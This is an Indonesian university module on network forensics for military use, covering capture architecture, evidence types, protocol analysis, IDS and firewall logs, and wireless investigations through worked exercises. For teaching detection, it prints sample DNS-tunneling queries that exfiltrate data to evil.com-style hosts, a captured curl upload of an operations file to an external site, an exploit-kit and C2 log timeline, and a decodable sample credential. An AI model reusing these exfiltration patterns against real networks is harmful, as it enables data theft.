Mata Kuliah: Digital Forensic for Military Purposes (Forensik Digital untuk Keperluan Militer)
SKS: 3 SKS
Pertemuan: 10
Topik: Forensik Jaringan
Pengampu: Anindito, S.Kom., S.S., S.H., M.TI., CHFI
Setelah menyelesaikan modul ini, mahasiswa diharapkan mampu:
Forensik Jaringan (Network Forensics) adalah cabang forensik digital yang berfokus pada pemantauan, penangkapan, pencatatan, dan analisis lalu lintas jaringan untuk tujuan pengumpulan bukti, deteksi intrusi, dan investigasi insiden keamanan.
Forensik jaringan sering disebut sebagai βnetwork wiretappingβ dalam konteks digital. Berbeda dengan forensik komputer yang menganalisis data statis pada media penyimpanan (seperti yang telah dibahas pada Pertemuan 03β07), forensik jaringan berfokus pada data yang bergerak melalui jaringan β data yang bersifat sangat volatile dan memerlukan penanganan khusus.
Marcus Ranum, salah satu pionir dalam bidang ini, mendefinisikan dua pendekatan utama dalam forensik jaringan:
| Pendekatan | Deskripsi | Analogi |
|---|---|---|
| βCatch-it-as-you-canβ | Semua paket yang melewati titik lalu lintas tertentu ditangkap dan disimpan untuk analisis selanjutnya | Memasang kamera CCTV yang merekam semua aktivitas |
| βStop, look, and listenβ | Setiap paket dianalisis secara real-time dalam memori, hanya informasi tertentu yang disimpan | Penjaga keamanan yang mengawasi dan mencatat aktivitas mencurigakan |
Dalam konteks militer Indonesia, forensik jaringan menjadi komponen kritis dalam:

Gambar 10.1: Konsep dan ruang lingkup forensik jaringan
Memahami perbedaan antara forensik jaringan dan forensik komputer (yang telah dipelajari pada Pertemuan 03β07) sangat penting untuk menentukan pendekatan investigasi yang tepat:
| Aspek | Forensik Komputer | Forensik Jaringan |
|---|---|---|
| Sumber Data | Hard disk, memori, registry | Packet captures, logs, flow data |
| Sifat Data | Relatif statis (data at rest) | Sangat dinamis (data in motion) |
| Preservasi | Imaging media penyimpanan | Real-time capture atau log retention |
| Volume | Terbatas pada kapasitas media | Potensial sangat besar (terabyte/hari) |
| Volatilitas | Rendah-sedang | Sangat tinggi |
| Cakupan | Satu sistem/perangkat | Seluruh segmen jaringan |
| Waktu | Post-mortem analysis | Real-time atau near-real-time |
| Konteks | Aktivitas pada satu host | Komunikasi antar host |
Soal: Seorang investigator forensik di Kodam IX/Udayana menerima laporan tentang kemungkinan kebocoran data rahasia melalui jaringan. Jelaskan mengapa forensik jaringan lebih tepat digunakan sebagai pendekatan utama dibandingkan forensik komputer pada kasus ini!
Penyelesaian:
Step 1: Identifikasi karakteristik kasus β kebocoran data melalui jaringan berarti data telah berpindah dari satu titik ke titik lain.
Step 2: Analisis keunggulan forensik jaringan untuk kasus ini:
Step 3: Limitasi forensik komputer dalam kasus ini:
Jawaban: Forensik jaringan lebih tepat karena kasus ini melibatkan perpindahan data melalui jaringan. Forensik jaringan dapat mengidentifikasi tujuan pengiriman data, volume transfer, waktu kejadian secara presisi, dan metode exfiltration yang digunakan β informasi yang sulit diperoleh hanya dari analisis komputer sumber.
Untuk melakukan forensik jaringan secara efektif, diperlukan arsitektur pengumpulan bukti yang tepat. Berikut adalah komponen-komponen kunci:
Network TAP adalah perangkat keras yang dipasang secara inline pada segmen jaringan untuk menyalin semua lalu lintas yang melewatinya tanpa memengaruhi performa jaringan.
Karakteristik Network TAP:
SPAN (Switched Port Analyzer) adalah fitur pada switch yang mengkopi lalu lintas dari satu atau beberapa port ke port monitoring yang ditentukan.
Konfigurasi SPAN pada Cisco Switch:
Switch(config)# monitor session 1 source interface Gi0/1 - Gi0/24
Switch(config)# monitor session 1 destination interface Gi0/48
| Aspek | Network TAP | SPAN Port |
|---|---|---|
| Biaya | Tinggi (perangkat tambahan) | Rendah (fitur bawaan switch) |
| Performa | Tidak memengaruhi jaringan | Dapat memengaruhi switch CPU |
| Paket Hilang | Tidak ada | Mungkin terjadi saat beban tinggi |
| Konfigurasi | Instalasi fisik | Konfigurasi software |
| Full-duplex | Ya, selalu | Tergantung konfigurasi |
Dalam konteks jaringan militer, penempatan sensor forensik harus mempertimbangkan:
[Internet] ββββ [Firewall] ββββ [DMZ] ββββ [IDS/IPS] ββββ [Core Switch] ββββ [Endpoints]
β β β
TAP #1 TAP #2 SPAN Port
(Perimeter) (Pre-Firewall) (Internal Traffic)
Soal: Tim Satsiber (Satuan Siber) TNI merencanakan pemasangan infrastruktur forensik jaringan di sebuah pangkalan militer. Jelaskan di mana saja sensor forensik sebaiknya dipasang dan alasannya!
Penyelesaian:
Step 1: Identifikasi topologi jaringan tipikal pangkalan militer:
Step 2: Tentukan posisi sensor untuk cakupan optimal:
| Posisi | Jenis Sensor | Alasan |
|---|---|---|
| Gateway Internet | Network TAP | Menangkap semua komunikasi eksternal; kritis untuk deteksi exfiltration dan C2 communication |
| Antara DMZ dan LAN | Network TAP | Mendeteksi lateral movement dari DMZ ke jaringan internal |
| Core Switch Internal | SPAN Port | Memonitor lalu lintas antar segmen jaringan; mendeteksi insider threat |
| Segmen Classified | Network TAP + Full Packet Capture | Segmen paling sensitif memerlukan recording lengkap untuk audit |
| Wireless Access Points | Wireless IDS/Sensor | Mendeteksi rogue access point dan unauthorized wireless access |
Step 3: Pertimbangan khusus militer:
Jawaban: Sensor forensik sebaiknya dipasang di lima titik strategis: gateway internet (TAP untuk semua komunikasi eksternal), antara DMZ dan LAN (TAP untuk deteksi lateral movement), core switch (SPAN untuk lalu lintas internal), segmen classified (TAP + full capture untuk audit), dan wireless access points (wireless IDS untuk deteksi akses tidak sah).
Bukti digital dari jaringan dapat dikategorikan dalam tiga tingkatan berdasarkan kedetailan informasi yang direkam:
Full Packet Capture adalah metode perekaman yang menangkap keseluruhan paket data yang melewati titik monitoring, termasuk header dan payload.
Full packet capture menyimpan informasi paling lengkap dan merupakan standar emas dalam forensik jaringan. Format file standar adalah PCAP (Packet Capture) atau PCAPNG (PCAP Next Generation).
Contoh informasi yang dapat diekstrak dari PCAP:
Kelebihan dan kekurangan:
| Aspek | Keterangan |
|---|---|
| Kelebihan | Informasi paling lengkap; dapat merekonstruksi sesi lengkap |
| Kekurangan | Memerlukan storage sangat besar; pada jaringan 1 Gbps, ~10 TB/hari |
| Cocok untuk | Investigasi mendalam; segmen jaringan sensitif |
Flow Data adalah ringkasan metadata komunikasi jaringan yang mencatat informasi tentang siapa berkomunikasi dengan siapa, kapan, menggunakan protokol apa, dan berapa banyak data yang ditransfer β tanpa merekam isi komunikasi.
Elemen standar dalam satu flow record:
Source IP : 192.168.1.100
Destination IP : 203.0.113.50
Source Port : 49152
Destination Port: 443
Protocol : TCP (6)
Bytes : 1,245,678
Packets : 847
Start Time : 2025-01-15 08:23:45
End Time : 2025-01-15 08:25:12
TCP Flags : SYN, ACK, PSH, FIN
| Format | Vendor | Versi | Keunggulan |
|---|---|---|---|
| NetFlow | Cisco | v5, v9 | Standar industri; didukung luas |
| sFlow | InMon | v5 | Sampling-based; overhead rendah |
| IPFIX | IETF | RFC 7011 | Standar terbuka; fleksibel |
| jFlow | Juniper | - | Kompatibel NetFlow v5/v9 |
Log files dari berbagai perangkat jaringan menyediakan catatan aktivitas yang penting untuk forensik:
| Sumber Log | Informasi Kunci | Format Umum |
|---|---|---|
| Firewall | Koneksi yang diizinkan/ditolak, rule yang terpicu | Syslog, CSV, proprietary |
| IDS/IPS | Alert keamanan, signature match, anomali | Syslog, JSON, PCAP (trigger) |
| Proxy Server | URL yang diakses, user agent, response code | Common Log Format (CLF) |
| DNS Server | Query dan response, NXDOMAIN | Syslog, query log |
| DHCP Server | IP assignment, MAC address, lease time | Syslog |
| VPN Gateway | Koneksi VPN, user authentication, durasi | Syslog, proprietary |
| Web Server | Access log, error log, request details | CLF, Combined Log Format |
Contoh format Combined Log Format dari web server:
203.0.113.50 - admin [15/Jan/2025:08:23:45 +0700] "GET /admin/config.php HTTP/1.1" 200 4523 "http://192.168.1.10/login" "Mozilla/5.0 (Windows NT 10.0)"
Interpretasi:
203.0.113.50 β IP sumberadmin β user terautentikasi[15/Jan/2025:08:23:45 +0700] β timestamp"GET /admin/config.php HTTP/1.1" β HTTP request200 β status code (OK)4523 β ukuran response dalam bytesSoal: Sebuah pangkalan Lantamal (Pangkalan Utama TNI AL) memiliki anggaran terbatas untuk implementasi forensik jaringan. Mereka hanya dapat memilih satu dari tiga jenis bukti jaringan (full packet capture, flow data, atau log files). Jenis bukti mana yang sebaiknya diprioritaskan dan mengapa?
Penyelesaian:
Step 1: Evaluasi setiap opsi:
| Kriteria | Full PCAP | Flow Data | Log Files |
|---|---|---|---|
| Biaya Storage | Sangat tinggi | Rendah | Sedang |
| Detail | Sangat lengkap | Metadata saja | Bervariasi |
| Ease of Use | Butuh expertise | Mudah dianalisis | Familiar |
| Existing Infra | Butuh sensor baru | Fitur bawaan router | Sudah ada |
Step 2: Dengan anggaran terbatas, flow data menjadi pilihan paling cost-effective:
Step 3: Strategi pelengkap: aktifkan juga log dari firewall dan IDS yang sudah ada (tanpa biaya tambahan), sebagai lapisan informasi tambahan di atas flow data.
Jawaban: Dengan anggaran terbatas, flow data (NetFlow/sFlow) sebaiknya diprioritaskan karena biaya implementasi rendah (sudah menjadi fitur bawaan sebagian besar router), kebutuhan storage minimal, dan tetap memberikan visibilitas yang memadai terhadap pola komunikasi jaringan untuk deteksi anomali dan investigasi awal.
Preservasi bukti jaringan memerlukan pendekatan khusus mengingat sifatnya yang volatile:
Prinsip chain of custody (seperti yang telah dipelajari pada Pertemuan 02) tetap berlaku dengan adaptasi khusus:
Dokumentasi Chain of Custody - Bukti Jaringan
=============================================
Nomor Bukti : NF-2025-001
Jenis : Full Packet Capture (PCAP)
Sumber : TAP pada gateway utama Kodam IX/Udayana
Periode Capture : 2025-01-15 00:00:00 - 2025-01-15 23:59:59
Ukuran File : 2.3 TB
Hash MD5 : a1b2c3d4e5f6g7h8i9j0...
Hash SHA-256 : 1234abcd5678efgh...
Tool Capture : tcpdump 4.9.3 / libpcap 1.10.1
Filter Applied : none (full capture)
Capture Interface : eth0 (connected to TAP)
Link Speed : 1 Gbps
Operator : Kapten Inf. [nama]
Langkah-langkah preservasi:
Soal: Seorang investigator forensik menangkap paket selama 24 jam pada jaringan 100 Mbps di sebuah markas militer. Estimasikan ukuran file PCAP yang dihasilkan dan jelaskan strategi penyimpanan yang tepat!
Penyelesaian:
Step 1: Hitung estimasi ukuran file PCAP:
Step 2: Pertimbangan overhead PCAP:
Step 3: Strategi penyimpanan:
Jawaban: File PCAP dari capture 24 jam pada jaringan 100 Mbps dengan utilisasi 30% diestimasi berukuran ~325 GB. Strategi penyimpanan yang tepat meliputi NAS/SAN dengan kapasitas 1+ TB, retention policy 7-14 hari untuk full PCAP dengan konversi ke flow data untuk jangka panjang, dan kompresi gzip untuk mengurangi ukuran ~50%.
Pemahaman mendalam tentang model TCP/IP sangat penting untuk analisis forensik jaringan. Setiap layer memberikan informasi yang berbeda untuk investigasi:
| Layer | Protokol | Informasi Forensik |
|---|---|---|
| Application (Layer 7) | HTTP, HTTPS, DNS, SMTP, FTP | Konten komunikasi, URL, email, file transfer |
| Transport (Layer 4) | TCP, UDP | Port number, session tracking, flags |
| Internet (Layer 3) | IP, ICMP | Alamat IP sumber/tujuan, TTL, routing |
| Network Access (Layer 2) | Ethernet, Wi-Fi | MAC address, VLAN tags |
Setiap koneksi TCP dimulai dengan three-way handshake. Memahami proses ini penting untuk mengidentifikasi koneksi yang berhasil versus percobaan scanning:
Client (192.168.1.100) Server (10.0.0.1:80)
| |
|---- SYN (seq=1000) -------->|
| |
|<--- SYN-ACK (seq=2000, ------|
| ack=1001) |
| |
|---- ACK (seq=1001, -------->|
| ack=2001) |
| |
| [Koneksi Established] |
| Flag | Hex | Signifikansi Forensik |
|---|---|---|
| SYN | 0x02 | Inisiasi koneksi; banyak SYN tanpa ACK = SYN scan/flood |
| ACK | 0x10 | Koneksi established; ACK scan untuk bypass firewall |
| FIN | 0x01 | Terminasi normal; FIN scan untuk stealth port scanning |
| RST | 0x04 | Koneksi direset; port tertutup atau filtered |
| PSH | 0x08 | Push data ke aplikasi; mengindikasikan transfer data aktif |
| URG | 0x20 | Data urgent; jarang digunakan, bisa jadi anomali |
| SYN+ACK | 0x12 | Respons SYN; port terbuka |
| RST+ACK | 0x14 | Port tertutup (respons normal) |
Contoh filter Wireshark untuk analisis TCP flags:
# Mendeteksi SYN scan (SYN tanpa completion)
tcp.flags.syn == 1 && tcp.flags.ack == 0
# Mendeteksi RST flood
tcp.flags.reset == 1
# Koneksi yang berhasil established
tcp.flags == 0x12
# Christmas Tree scan (semua flags aktif)
tcp.flags.fin == 1 && tcp.flags.syn == 1 && tcp.flags.rst == 1 && tcp.flags.psh == 1 && tcp.flags.ack == 1 && tcp.flags.urg == 1
Soal: Dalam sebuah PCAP file dari jaringan Kodam, ditemukan pola berikut dari IP 203.0.113.50 menuju berbagai port pada server 10.0.0.5:
Paket 1: 203.0.113.50:45231 β 10.0.0.5:22 [SYN] β [RST, ACK]
Paket 2: 203.0.113.50:45232 β 10.0.0.5:80 [SYN] β [SYN, ACK] β [RST]
Paket 3: 203.0.113.50:45233 β 10.0.0.5:443 [SYN] β [SYN, ACK] β [RST]
Paket 4: 203.0.113.50:45234 β 10.0.0.5:3389 [SYN] β [RST, ACK]
Paket 5: 203.0.113.50:45235 β 10.0.0.5:8080 [SYN] β [RST, ACK]
Paket 6: 203.0.113.50:45236 β 10.0.0.5:3306 [SYN] β [SYN, ACK] β [RST]
Identifikasi jenis aktivitas ini dan tentukan port mana yang terbuka!
Penyelesaian:
Step 1: Analisis pola β satu IP sumber mengirim SYN ke banyak port berbeda pada satu target. Ini adalah karakteristik TCP SYN scan (port scanning).
Step 2: Identifikasi port status berdasarkan respons:
Step 3: Klasifikasi:
| Port | Service | Respons | Status |
|---|---|---|---|
| 22 | SSH | RST, ACK | Tertutup |
| 80 | HTTP | SYN, ACK β RST | Terbuka |
| 443 | HTTPS | SYN, ACK β RST | Terbuka |
| 3389 | RDP | RST, ACK | Tertutup |
| 8080 | HTTP Alt | RST, ACK | Tertutup |
| 3306 | MySQL | SYN, ACK β RST | Terbuka |
Step 4: Implikasi keamanan β port MySQL (3306) terbuka dan dapat diakses dari luar jaringan merupakan risiko keamanan tinggi, terutama karena scanner eksternal dapat mendeteksinya.
Jawaban: Aktivitas ini adalah TCP SYN scan (port scanning) dari IP eksternal 203.0.113.50. Port yang terbuka adalah: 80 (HTTP), 443 (HTTPS), dan 3306 (MySQL). Port 3306 yang terbuka untuk akses eksternal merupakan temuan keamanan kritis yang memerlukan tindakan segera.
DNS (Domain Name System) adalah protokol yang menerjemahkan nama domain menjadi alamat IP. Dalam forensik jaringan, DNS merupakan salah satu sumber bukti paling berharga karena hampir semua aktivitas internet dimulai dengan query DNS.
Informasi forensik dari DNS:
| Elemen DNS | Nilai Forensik |
|---|---|
| Query name | Domain yang diakses oleh host |
| Query type | A (IPv4), AAAA (IPv6), MX (mail), TXT (text record) |
| Response IP | Server yang direspon; dapat berubah jika DNS hijacking |
| TTL | Indikator caching; TTL rendah sering digunakan C2 |
| NXDOMAIN | Domain tidak ada; banyak NXDOMAIN = DGA malware |
| TXT records | Sering digunakan untuk DNS tunneling dan data exfiltration |
Filter Wireshark untuk analisis DNS:
# Semua query DNS
dns.qry.name
# DNS query ke domain tertentu
dns.qry.name contains "suspicious-domain.com"
# DNS response NXDOMAIN (domain tidak ditemukan)
dns.flags.rcode == 3
# DNS TXT records (potential tunneling)
dns.qry.type == 16
# DNS query dengan panjang nama tidak wajar (>50 karakter)
dns.qry.name.len > 50
DNS Tunneling adalah teknik yang menyalahgunakan protokol DNS untuk mengirimkan data melalui query dan response DNS, sering digunakan untuk data exfiltration atau komunikasi Command and Control (C2) karena DNS jarang diblokir oleh firewall.
Indikator DNS tunneling:
Contoh query DNS normal:
www.example.com β Panjang: 15 karakter
Contoh query DNS tunneling:
aGVsbG8gd29ybGQ.data.evil.com β Panjang: 34 karakter
(Base64 encoded "hello world" sebagai subdomain)
bXlfc2VjcmV0X2RhdGFfMTIzNDU2.c2.evil.com β Panjang: 48 karakter
(Encoded secret data sebagai subdomain)
Karakteristik DNS tunneling yang dapat dideteksi:
Soal: Berikut adalah sampel DNS query yang ditemukan dalam PCAP dari jaringan markas TNI:
Query 1: www.google.com (A record)
Query 2: mail.kemhan.go.id (MX record)
Query 3: dGhpcyBpcyBhIHRlc3Q.data.xyz123.net (TXT record)
Query 4: c2VjcmV0IGZpbGUgY29udGVudA.data.xyz123.net (TXT record)
Query 5: www.bing.com (A record)
Query 6: ZW5jcnlwdGVkIGRhdGEgaGVyZQ.data.xyz123.net (TXT record)
Query 7: update.microsoft.com (A record)
Identifikasi query mana yang mencurigakan dan jelaskan alasannya!
Penyelesaian:
Step 1: Analisis setiap query:
Step 2: Decode Base64 pada query mencurigakan:
dGhpcyBpcyBhIHRlc3Q β βthis is a testβc2VjcmV0IGZpbGUgY29udGVudA β βsecret file contentβZW5jcnlwdGVkIGRhdGEgaGVyZQ β βencrypted data hereβStep 3: Indikator DNS tunneling terpenuhi:
Jawaban: Query 3, 4, dan 6 sangat mencurigakan dan merupakan indikasi kuat DNS tunneling untuk data exfiltration. Subdomain berisi data Base64-encoded yang ketika di-decode mengungkap teks bermakna (βthis is a testβ, βsecret file contentβ, βencrypted data hereβ). Semua query mengarah ke domain yang sama (xyz123.net) dengan tipe TXT record. Ini menunjukkan adanya upaya pengiriman data rahasia melalui saluran DNS.
HTTP adalah protokol clear-text yang memberikan informasi sangat kaya untuk forensik:
GET /documents/classified/report-2025.pdf HTTP/1.1
Host: internal-server.kodam.mil.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/pdf
Cookie: session_id=a1b2c3d4e5; user=admin
Referer: http://internal-server.kodam.mil.id/documents/
Authorization: Basic YWRtaW46cGFzc3dvcmQxMjM=
Informasi forensik yang dapat diekstrak:
| Elemen | Informasi | Nilai Forensik |
|---|---|---|
| Method | GET, POST, PUT, DELETE | Jenis aksi yang dilakukan |
| URI | /documents/classified/report-2025.pdf | File yang diakses |
| Host | internal-server.kodam.mil.id | Server target |
| User-Agent | Mozilla/5.0β¦ | Browser/tool yang digunakan |
| Cookie | session_id=β¦; user=admin | Identitas session dan user |
| Authorization | Basic YWRtaW46cGFzc3dvcmQxMjM= | Kredensial (Base64: admin:password123) |
| Referer | URL sebelumnya | Navigasi pengguna |
HTTPS menggunakan TLS (Transport Layer Security) untuk mengenkripsi komunikasi, sehingga payload tidak dapat dibaca langsung dari packet capture. Namun, beberapa informasi tetap tersedia:
| Informasi yang Tersedia | Informasi yang Terenkripsi |
|---|---|
| IP sumber dan tujuan | URL lengkap (path) |
| SNI (Server Name Indication) | Konten request/response |
| Certificate details | Header HTTP |
| Ukuran data yang ditransfer | Cookie dan kredensial |
| Pola timing koneksi | Body payload |
| TLS version dan cipher suite | Query string |
# Filter Wireshark untuk analisis TLS/HTTPS
# SNI (Server Name Indication) - domain yang diakses
tls.handshake.extensions_server_name
# TLS certificate issuer
tls.handshake.certificate
# TLS version
tls.handshake.version
# Cipher suite yang digunakan
tls.handshake.ciphersuite
Soal: Dalam analisis PCAP dari jaringan operasional TNI, ditemukan HTTP request berikut:
POST /upload.php HTTP/1.1
Host: file-share.suspicious-site.net
Content-Type: multipart/form-data; boundary=--abc123
Content-Length: 15728640
User-Agent: curl/7.68.0
----abc123
Content-Disposition: form-data; name="file"; filename="laporan_operasi_q4.xlsx"
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
[binary data...]
Analisis temuan ini dari perspektif forensik!
Penyelesaian:
Step 1: Identifikasi elemen mencurigakan:
Step 2: Rekonstruksi skenario:
Seseorang menggunakan tool command-line curl untuk mengupload file βlaporan_operasi_q4.xlsxβ (kemungkinan laporan operasi kuartal 4) ke website eksternal yang mencurigakan. Ini merupakan indikasi kuat data exfiltration.
Step 3: Langkah investigasi lanjutan:
Jawaban: Temuan ini merupakan indikasi kuat data exfiltration. Seseorang menggunakan curl (command-line) untuk mengupload dokumen operasional militer berukuran ~15 MB ke server eksternal mencurigakan. Elemen kunci mencurigakan meliputi penggunaan command-line tool (bukan browser), domain tujuan yang tidak dikenal, nama file yang mengindikasikan dokumen operasional, dan ukuran file yang besar.
SMTP (Simple Mail Transfer Protocol) adalah protokol standar untuk pengiriman email. Dalam forensik jaringan, analisis SMTP pada level paket dapat mengungkap komunikasi email yang tidak terdeteksi oleh log server email.
Anatomi komunikasi SMTP dalam packet capture:
C: EHLO client.example.com
S: 250-mail.server.com Hello
C: MAIL FROM:<sender@example.com>
S: 250 OK
C: RCPT TO:<recipient@external.com>
S: 250 OK
C: DATA
S: 354 Start mail input
C: From: sender@example.com
C: To: recipient@external.com
C: Subject: Project Update
C: Date: Wed, 15 Jan 2025 08:30:00 +0700
C: Content-Type: multipart/mixed; boundary="boundary123"
C:
C: --boundary123
C: Content-Type: text/plain
C:
C: Please find the attached document.
C:
C: --boundary123
C: Content-Type: application/pdf
C: Content-Disposition: attachment; filename="report.pdf"
C: Content-Transfer-Encoding: base64
C:
C: [Base64 encoded file data]
C: --boundary123--
C: .
S: 250 OK Message queued
Filter Wireshark untuk analisis SMTP:
# Semua traffic SMTP
smtp
# Email dengan attachment
smtp.req.parameter contains "filename"
# Email ke domain tertentu
smtp.req.parameter contains "@external-domain.com"
# SMTP authentication
smtp.req.command == "AUTH"
Soal: Jelaskan mengapa analisis email pada level jaringan (SMTP traffic) dapat memberikan informasi yang tidak tersedia dari analisis email server log biasa!
Penyelesaian:
Step 1: Informasi dari email server log biasanya terbatas pada metadata (sender, recipient, timestamp, subject, size) tanpa konten email.
Step 2: Analisis SMTP traffic pada PCAP memberikan informasi tambahan:
| Informasi | Server Log | SMTP Traffic (PCAP) |
|---|---|---|
| Sender/Recipient | β | β |
| Timestamp | β | β |
| Subject | β | β |
| Body email | β | β |
| Attachment content | β | β (dapat di-extract) |
| SMTP commands | β | β |
| Authentication details | Partial | β (lengkap) |
| Encryption negotiation | β | β (STARTTLS) |
| Client IP asli | Via header | β (dari paket) |
Step 3: Kasus khusus di mana SMTP traffic analysis kritis:
Jawaban: Analisis SMTP traffic pada PCAP memberikan akses ke konten lengkap email (body text dan attachment), detail autentikasi SMTP, negosiasi enkripsi, dan IP asli pengirim β informasi yang tidak tersedia dari server log biasa yang biasanya hanya mencatat metadata.
IDS (Intrusion Detection System) adalah sistem yang memonitor lalu lintas jaringan atau aktivitas sistem untuk mendeteksi aktivitas berbahaya atau pelanggaran kebijakan keamanan.
Jenis IDS berdasarkan pendekatan:
| Jenis | Metode Deteksi | Kelebihan | Kelemahan |
|---|---|---|---|
| Signature-based | Mencocokkan pola yang diketahui | Akurat untuk serangan yang dikenal; rendah false positive | Tidak mendeteksi serangan baru (zero-day) |
| Anomaly-based | Mendeteksi penyimpangan dari baseline normal | Dapat mendeteksi serangan baru | Tinggi false positive; butuh training |
| Hybrid | Kombinasi signature + anomaly | Cakupan luas | Kompleksitas tinggi |
Snort dan Suricata adalah IDS open-source yang banyak digunakan. Format alert standar Snort:
[**] [1:2024217:3] ET MALWARE Trickbot CnC Beacon [**]
[Classification: A Network Trojan was Detected] [Priority: 1]
01/15/2025-08:23:45.123456 192.168.1.100:49152 -> 203.0.113.50:443
TCP TTL:128 TOS:0x0 ID:12345 IpLen:20 DgmLen:287 DF
***AP*** Seq: 0xABCDEF12 Ack: 0x12345678 Win: 0xFAF0 TcpLen: 20
Interpretasi:
Firewall log memberikan catatan tentang koneksi yang diizinkan dan ditolak. Contoh format log dari berbagai vendor:
Contoh log iptables (Linux):
Jan 15 08:23:45 firewall kernel: [DROP] IN=eth0 OUT= MAC=aa:bb:cc:dd:ee:ff SRC=203.0.113.50 DST=10.0.0.5 LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=12345 DF PROTO=TCP SPT=45231 DPT=22 WINDOW=65535 RES=0x00 SYN URGP=0
Contoh log Palo Alto Networks:
2025/01/15 08:23:45,TRAFFIC,drop,192.168.1.100,203.0.113.50,0.0.0.0,0.0.0.0,Deny-All,admin,,web-browsing,vsys1,trust,untrust,eth1/1,eth1/2,Log-Forwarding,2025/01/15 08:23:45,12345,1,49152,443,0,0,0x0,tcp,deny,256,256,0,1,2025/01/15 08:23:45,0,any,0,4567890,0x0,192.168.0.0-192.168.255.255,US
Teknik korelasi log dari berbagai sumber untuk mendapatkan gambaran lengkap serangan:
Timeline Rekonstruksi:
===================================
08:20:00 [DNS Log] β 192.168.1.100 query: exploit-kit.malware.net β 203.0.113.50
08:20:01 [Firewall] β ALLOW 192.168.1.100:49152 β 203.0.113.50:80 (HTTP)
08:20:02 [IDS Alert] β ET EXPLOIT Kit Landing Page detected
08:20:05 [Proxy Log] β 192.168.1.100 GET http://exploit-kit.malware.net/payload.exe 200 OK
08:20:10 [Firewall] β ALLOW 192.168.1.100:49200 β 198.51.100.25:443 (HTTPS)
08:20:11 [IDS Alert] β ET MALWARE CnC Beacon Activity Detected
08:20:15 [DNS Log] β 192.168.1.100 query: c2.attacker.net β 198.51.100.25
08:21:00 [Firewall] β ALLOW 192.168.1.100:49300 β 198.51.100.25:443 (data: 5.2MB)
08:21:30 [IDS Alert] β ET POLICY Large Outbound Data Transfer
Soal: Berdasarkan timeline log di atas, rekonstruksi kronologi serangan dan identifikasi tahapan serangan berdasarkan Cyber Kill Chain!
Penyelesaian:
Step 1: Korelasikan event dalam timeline:
| Waktu | Event | Tahap Kill Chain |
|---|---|---|
| 08:20:00 | DNS resolve exploit-kit.malware.net | Delivery β user mengakses website berbahaya |
| 08:20:01 | Koneksi HTTP ke server exploit kit | Delivery β koneksi ke exploit kit |
| 08:20:02 | IDS mendeteksi exploit kit landing page | Exploitation β exploit kit aktif |
| 08:20:05 | Download payload.exe berhasil | Installation β malware di-download |
| 08:20:10 | Koneksi HTTPS ke IP berbeda | Command & Control β malware berkomunikasi dengan C2 |
| 08:20:15 | DNS resolve c2.attacker.net | C2 β resolve domain C2 server |
| 08:21:00 | Transfer data 5.2 MB ke C2 server | Actions on Objectives β data exfiltration |
| 08:21:30 | IDS alert data transfer besar | Detection β deteksi aktivitas |
Step 2: Narasi rekonstruksi:
Jawaban: Serangan mengikuti Cyber Kill Chain: Delivery (akses exploit kit via web), Exploitation (exploit kit aktif), Installation (download payload.exe), C2 (koneksi ke 198.51.100.25 via HTTPS), dan Actions on Objectives (exfiltration 5.2 MB data). Seluruh proses dari akses awal hingga exfiltration terjadi dalam waktu ~90 detik, menunjukkan serangan yang sangat terautomasi.
Wireless Network Forensics adalah proses pengumpulan dan analisis bukti digital dari komunikasi jaringan nirkabel, termasuk Wi-Fi (IEEE 802.11), Bluetooth, dan protokol wireless lainnya.
Tantangan khusus dalam forensik wireless:
| Tantangan | Penjelasan |
|---|---|
| Broadcast medium | Sinyal dapat ditangkap oleh siapa saja dalam jangkauan |
| Ephemeral | Data tidak tersimpan di media penyimpanan tetap |
| Encryption | WPA2/WPA3 mengenkripsi payload; tanpa kunci tidak dapat di-decrypt |
| Interference | Gangguan sinyal dapat menyebabkan packet loss |
| Attribution | MAC address dapat di-spoof; sulit mengidentifikasi perangkat asli |
| Legal issues | Intersepsi komunikasi wireless memerlukan otorisasi hukum |
Informasi yang dapat diekstrak dari capture wireless:
IEEE 802.11 Beacon Frame:
SSID: "KODAM-WIFI-SECURE"
BSSID: AA:BB:CC:DD:EE:FF
Channel: 6
Supported Rates: 6, 9, 12, 18, 24, 36, 48, 54 Mbps
RSN Information: WPA2-Enterprise (AES-CCMP)
Country: ID
Timestamp: 08:23:45.123456
Probe Request adalah frame yang dikirim oleh perangkat wireless untuk mencari jaringan yang pernah terhubung sebelumnya. Frame ini mengandung SSID jaringan yang dicari dan MAC address perangkat.
Implikasi forensik probe request:
Contoh Probe Request yang ditemukan:
Device MAC: 11:22:33:44:55:66
Probe for SSID: "HOTEL-WIFI-FREE"
Probe for SSID: "AIRPORT-GUEST"
Probe for SSID: "KODAM-INTERNAL"
Probe for SSID: "HOME-NETWORK-Admin"
Dari contoh di atas, dapat disimpulkan bahwa perangkat ini pernah terhubung ke Wi-Fi hotel, bandara, jaringan Kodam, dan jaringan rumah β memberikan informasi tentang pergerakan dan kebiasaan pemiliknya.
Dalam konteks militer, deteksi rogue access point sangat kritis:
Hasil scanning Wi-Fi di area markas:
==============================================
SSID BSSID CH Signal Encryption
KODAM-WIFI-SECURE AA:BB:CC:DD:EE:FF 6 -45dBm WPA2-Ent
KODAM-WIFI-SECURE 11:22:33:44:55:66 1 -60dBm WPA2-PSK β ROGUE!
GUEST-NETWORK AA:BB:CC:DD:EE:01 11 -50dBm WPA2-PSK
FREE-WIFI-KODAM 99:88:77:66:55:44 6 -70dBm Open β ROGUE!
Indikator rogue AP:
Soal: Tim keamanan Lantamal V menemukan access point dengan SSID βLANTAMAL-WIFI-SECUREβ yang tidak terdaftar dalam inventaris jaringan. Jelaskan langkah-langkah forensik untuk menginvestigasi rogue access point ini!
Penyelesaian:
Step 1: Identifikasi dan Dokumentasi
Step 2: Lokalisasi Fisik
Step 3: Capture Traffic
Step 4: Analisis Rogue AP
Step 5: Forensik Klien
Jawaban: Investigasi rogue AP mencakup lima langkah: identifikasi dan dokumentasi profil AP, lokalisasi fisik melalui triangulasi sinyal, capture traffic pada channel rogue AP, analisis konfigurasi AP untuk mendeteksi man-in-the-middle atau evil twin, dan forensik pada semua klien yang pernah terhubung untuk menilai dampak keamanan.
Rekonstruksi serangan berbasis jaringan melibatkan penyusunan kronologi lengkap serangan dari bukti jaringan yang dikumpulkan. Proses ini membutuhkan korelasi data dari berbagai sumber.
Metodologi Rekonstruksi Serangan Jaringan:
==========================================
1. Collection β Kumpulkan semua PCAP, logs, flow data
